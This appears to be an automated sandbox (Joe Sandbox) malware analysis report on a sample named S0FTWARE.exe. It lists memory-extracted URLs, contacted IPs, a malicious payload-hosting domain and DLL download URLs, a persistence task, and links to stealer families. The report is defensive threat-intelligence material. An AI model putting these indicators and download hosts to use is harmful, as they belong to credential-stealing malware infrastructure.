                                                                                                                                                                                            https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 00000005.00000002.2733051632.000007C000500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734639165.000007C00075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2740760153.000007C001048000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 00000005.00000002.2734862905.000007C0007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739984141.000007C000F54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732932489.000007C0004A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://docs.google.com/spreadsheets/chrome.exe, 00000005.00000002.2741278328.000007C00119C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000009.00000003.2766795323.00007CF000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767180241.00007CF00026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://anglebug.com/3078chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://anglebug.com/7553chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://anglebug.com/5375chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000009.00000003.2766795323.00007CF000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767180241.00007CF00026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://www.youtube.com/s/notifications/manifest/cr_install.htmlltchrome.exe, 00000005.00000002.2740760153.000007C001048000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://anglebug.com/5371chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://anglebug.com/4722chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://bbuseruploads.s3.amazonaws.com/11775b90-6f69-4884-847d-757e205605be/downloads/08b6d961-2cc7-BitLockerToGo.exe, 00000003.00000002.3359198623.0000000003172000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://m.google.com/devicemanagement/data/apichrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000009.00000003.2766795323.00007CF000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767180241.00007CF00026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://www.youtube.com/s/notifications/manifest/cr_install.htmlPchrome.exe, 00000005.00000002.2742837621.000007C001678000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zBitLockerToGo.exe, 00000003.00000002.3359198623.0000000003195000.00000004.00000020.00020000.00000000.sdmp, AAFIJKKEHJ.exe, 00000014.00000003.3288077663.000001C489480000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://chrome.google.cochrome.exe, 00000005.00000002.2731148106.000007C00012C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                              https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 00000005.00000002.2733051632.000007C000500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734639165.000007C00075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2740760153.000007C001048000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                http://www.innosetup.comDBitLockerToGo.exe, 00000003.00000002.3359198623.0000000003172000.00000004.00000020.00020000.00000000.sdmp, AAFIJKKEHJ.exe, 00000014.00000003.3288077663.000001C489480000.00000004.00000001.00020000.00000000.sdmp, AAFIJKKEHJ.exe, 00000014.00000000.3224811182.00007FF6AEAE2000.00000002.00000001.01000000.00000014.sdmpfalse
                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                  https://cdn.cookielaw.org/BitLockerToGo.exe, 00000003.00000002.3359198623.000000000319C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLBitLockerToGo.exe, 00000003.00000003.3053644888.000000001DF04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      http://anglebug.com/7556chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                        https://drive-daily-4.cchrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                                          https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refBitLockerToGo.exe, 00000003.00000002.3358442703.0000000002F37000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                                            https://chromewebstore.google.com/chrome.exe, 00000005.00000002.2730625918.000007C00001C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000002.2829522376.00007CF00016C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                                              https://www.youtube.com/?feature=ytcaoglchrome.exe, 00000005.00000002.2741038731.000007C0010F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                                https://drive-preprod.corp.google.com/chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002F37000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                                    https://fuare.xyz/sqlo.dllJ&BitLockerToGo.exe, 00000003.00000003.2715960925.0000000002EE5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2624131446.0000000002EE9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2641754783.0000000002EE9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2564882804.0000000002EE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                                      https://clients4.google.com/chrome-syncchrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                                        https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                                                          http://html4/loose.dtdS0FTWARE.exe, 00000000.00000002.2233426757.0000000001C9E000.00000008.00000001.01000000.00000003.sdmp, S0FTWARE.exe, 00000000.00000000.2022629445.0000000001C9E000.00000008.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                                                            https://fuare.xyz/vcruntime140.dll6BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                                              http://anglebug.com/6692chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                                                https://issuetracker.google.com/258207403msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                                                  https://docs.google.com/document/doglchrome.exe, 00000005.00000002.2741038731.000007C0010F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                                                    http://ocsp.sectigo.com0BitLockerToGo.exe, 00000003.00000002.3359198623.0000000003195000.00000004.00000020.00020000.00000000.sdmp, AAFIJKKEHJ.exe, 00000014.00000003.3288077663.000001C489480000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                                                      http://anglebug.com/3502chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                        		high

                                                                                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                        18.245.60.72
                                                                                                                                                                                                                                                                        		sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                                                        		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                        13.107.246.45
                                                                                                                                                                                                                                                                        		s-part-0017.t-0009.t-msedge.netUnited States
                                                                                                                                                                                                                                                                        		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                        20.125.209.212
                                                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                        162.159.61.3
                                                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                        23.221.22.199
                                                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                                                        		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                                        23.47.50.138
                                                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                                                        		16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                                                                        239.255.255.250
                                                                                                                                                                                                                                                                        		unknownReserved
                                                                                                                                                                                                                                                                        		unknownunknownfalse
                                                                                                                                                                                                                                                                        116.203.0.159
                                                                                                                                                                                                                                                                        		fuare.xyzGermany
                                                                                                                                                                                                                                                                        		24940HETZNER-ASDEtrue
                                                                                                                                                                                                                                                                        20.75.60.91
                                                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                        216.58.206.78
                                                                                                                                                                                                                                                                        		plus.l.google.comUnited States
                                                                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                        152.195.19.97
                                                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                                                        		15133EDGECASTUSfalse
                                                                                                                                                                                                                                                                        185.166.143.49
                                                                                                                                                                                                                                                                        		bitbucket.orgGermany
                                                                                                                                                                                                                                                                        		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                        149.154.167.99
                                                                                                                                                                                                                                                                        		t.meUnited Kingdom
                                                                                                                                                                                                                                                                        		62041TELEGRAMRUfalse
                                                                                                                                                                                                                                                                        52.182.143.215
                                                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                        65.52.241.40
                                                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                        204.79.197.219
                                                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                                                        		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                        142.250.186.97
                                                                                                                                                                                                                                                                        		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                        172.64.41.3
                                                                                                                                                                                                                                                                        		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                        23.198.7.171
                                                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                                                        		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                                        13.107.246.57
                                                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                                                        		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                        94.245.104.56
                                                                                                                                                                                                                                                                        		ssl.bingadsedgeextension-prod-europe.azurewebsites.netUnited Kingdom
                                                                                                                                                                                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                        18.161.170.118
                                                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                                                        		3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                                        142.250.186.164
                                                                                                                                                                                                                                                                        		www.google.comUnited States
                                                                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                        23.198.7.178
                                                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                                                        		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                                        3.5.30.241
                                                                                                                                                                                                                                                                        		s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                                                                                                                                                        		14618AMAZON-AESUSfalse

                                                                                                                                                                                                                                                                        Private

                                                                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                                                                        192.168.2.4
                                                                                                                                                                                                                                                                        192.168.2.6
                                                                                                                                                                                                                                                                        192.168.2.5
                                                                                                                                                                                                                                                                        127.0.0.1
                                                                                                                                                                                                                                                                        192.168.2.17
                                                                                                                                                                                                                                                                        192.168.2.16

                                                                                                                                                                                                                                                                        General Information

                                                                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                        Analysis ID:1555865
                                                                                                                                                                                                                                                                        Start date and time:2024-11-14 15:24:08 +01:00
                                                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                        Overall analysis duration:0h 19m 15s
                                                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                        Number of analysed new started processes analysed:65
                                                                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                                                        Sample name:S0FTWARE.exe
                                                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                                                        Classification:mal100.troj.adwa.spyw.evad.winEXE@138/236@36/31
                                                                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                                                                        • Successful, ratio: 50%
                                                                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                                                                        • Number of executed functions: 93
                                                                                                                                                                                                                                                                        • Number of non-executed functions: 231
                                                                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                                        • Override analysis time to 240s for powershell

                                                                                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                                                                                        • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 2.22.50.131, 192.229.221.95, 172.217.16.195, 142.250.186.78, 64.233.166.84, 34.104.35.123, 172.217.18.3, 184.28.90.27, 172.217.16.202, 216.58.212.170, 216.58.212.138, 142.250.185.234, 142.250.185.170, 142.250.186.138, 142.250.186.74, 142.250.186.170, 142.250.186.106, 142.250.185.106, 142.250.185.202, 216.58.206.74, 142.250.185.138, 142.250.184.234, 142.250.185.74, 172.217.23.106, 142.250.181.234, 142.250.186.42, 142.250.184.202, 142.250.74.202, 216.58.206.42, 172.217.18.10, 204.79.197.203, 204.79.197.239, 13.107.21.239, 172.217.18.14, 13.107.6.158, 13.107.42.16, 2.19.126.145, 2.19.126.152, 20.82.9.214, 40.126.32.68, 40.126.32.72, 40.126.32.74, 40.126.32.134, 40.126.32.136, 20.190.160.17, 40.126.32.133, 40.126.32.76, 88.221.110.179, 88.221.110.195, 2.23.209.135, 2.23.209.192, 2.23.209.136, 2.23.209.133, 2.23.209.131, 2.23.209.137, 2.23.209.130, 2.23.209.188, 2.23.209.189, 2.16.241.76, 2.16.241.97, 2.23.209.160, 2.23.209.154, 2.23.209.158, 2.23.209.152, 2.23.209.144, 2.
                                                                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, config-edge-skype.l-0007.l-msedge.net, login.live.com, e16604.g.akamaiedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, www.tm.v4.a.prd.aadg.akadns.net, ogads-pa.googleapis.com, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, wildcardtlu-ssl.azureedge.net, edgedl.me.gvt1.com, c.bing.com, edge
                                                                                                                                                                                                                                                                        • Execution Graph export aborted for target S0FTWARE.exe, PID 744 because there are no executed function
                                                                                                                                                                                                                                                                        • Execution Graph export aborted for target Updater.exe, PID 8020 because there are no executed function
                                                                                                                                                                                                                                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                        • VT rate limit hit for: S0FTWARE.exe

                                                                                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                                                                        09:25:49API Interceptor1x Sleep call for process: BitLockerToGo.exe modified
                                                                                                                                                                                                                                                                        09:25:59API Interceptor4x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                                                        09:26:58API Interceptor1x Sleep call for process: AAFIJKKEHJ.exe modified
                                                                                                                                                                                                                                                                        09:26:59API Interceptor18x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                                                        09:27:38API Interceptor13949440x Sleep call for process: GHDAKKJJJK.exe modified
                                                                                                                                                                                                                                                                        09:27:40API Interceptor12478683x Sleep call for process: service.exe modified
                                                                                                                                                                                                                                                                        15:27:07Task SchedulerRun new task: MyApp path: C:\Users\user\AppData\Roaming\service.exe

                                                                                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                                                                                        IPs

                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                        18.245.60.72file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                          https://www.canva.com/design/DAGOCNo1NUI/fm7sxEzJIeZ3v2miLpNZCw/view?utm_content=DAGOCNo1NUI&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                A3W2CpXxiO.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                          https://www.canva.com/design/DAGVD7_HMvQ/PFkDB3TDx6Ru4nNALhSqqQ/view?utm_content=DAGVD7_HMvQ&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                            20.125.209.212file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
